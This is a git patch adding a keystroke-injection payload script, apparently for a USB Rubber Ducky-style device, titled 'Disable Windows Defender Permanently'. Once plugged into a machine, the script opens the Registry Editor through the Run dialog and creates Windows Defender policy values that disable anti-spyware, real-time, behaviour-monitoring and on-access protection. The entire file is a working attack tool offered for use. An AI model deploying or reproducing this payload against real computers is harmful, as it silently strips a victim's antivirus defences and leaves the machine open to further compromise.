From 0a0a7aab94794bb5704ccb951f54a903e4eac17e Mon Sep 17 00:00:00 2001
From: HokkaidoInu <78092452+HokkaidoInu@users.noreply.github.com>
Date: Mon, 13 Sep 2021 22:29:04 +0100
Subject: [PATCH] Create payload.txt (#20)

---
 .../payload.txt                               | 118 ++++++++++++++++++
 1 file changed, 118 insertions(+)
 create mode 100644 payloads/library/general/Disable-Windows-Defender-Permanently/payload.txt

diff --git a/payloads/library/general/Disable-Windows-Defender-Permanently/payload.txt b/payloads/library/general/Disable-Windows-Defender-Permanently/payload.txt
new file mode 100644
index 0000000..836148c
--- /dev/null
+++ b/payloads/library/general/Disable-Windows-Defender-Permanently/payload.txt
@@ -0,0 +1,118 @@
+REM Title: Disable Windows Defender Permanently
+REM Description: Disables windows defender permanently through Registry Editor, computer has to restart for changes to take effect
+REM Author: https://github.com/HokkaidoInu
+REM delay: You may want to change the delays and/or delete some, I have it like it is because I have really slow computer
+DELAY 4000
+GUI r
+DELAY 4000
+STRING regedit
+DELAY 4000
+ENTER
+DELAY 4000
+LEFT
+DELAY 4000
+ENTER
+DELAY 4000
+TAB
+DELAY 4000
+TAB
+DELAY 4000
+STRING HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
+DELAY 4000
+ENTER
+DELAY 4000
+APP
+DELAY 4000
+STRING n
+DELAY 4000
+STRING d
+DELAY 4000
+STRING DisableAntiSpyware
+DELAY 4000
+ENTER
+DELAY 4000
+APP
+DELAY 4000
+STRING m
+DELAY 4000
+STRING 1
+DELAY 4000
+ENTER
+DELAY 4000
+TAB
+DELAY 4000
+TAB
+DELAY 4000
+APP
+DELAY 4000
+STRING n
+DELAY 4000
+STRING k
+DELAY 4000
+STRING Real-Time Protection
+DELAY 4000
+ENTER
+DELAY 4000
+APP
+DELAY 4000
+STRING n
+DELAY 4000
+STRING d
+DELAY 4000
+STRING DisableBehaviorMonitoring
+DELAY 4000
+ENTER
+DELAY 4000
+APP
+DELAY 4000
+STRING m
+DELAY 4000
+STRING 1
+DELAY 4000
+ENTER
+DELAY 4000
+TAB
+DELAY 4000
+TAB
+DELAY 4000
+APP
+DELAY 4000
+STRING n
+DELAY 4000
+STRING d
+DELAY 4000
+STRING DisableOnAccessProtection
+DELAY 4000
+ENTER
+DELAY 4000
+APP
+DELAY 4000
+STRING m
+DELAY 4000
+STRING 1
+DELAY 4000
+ENTER
+DELAY 4000
+TAB
+DELAY 4000
+TAB
+DELAY 4000
+APP
+DELAY 4000
+STRING n
+DELAY 4000
+STRING d
+DELAY 4000
+STRING DisableScanOnRealtimeEnable
+DELAY 4000
+ENTER
+DELAY 4000
+APP
+DELAY 4000
+STRING m
+DELAY 4000
+STRING 1
+DELAY 4000
+ENTER
+DELAY 4000
+ALT F X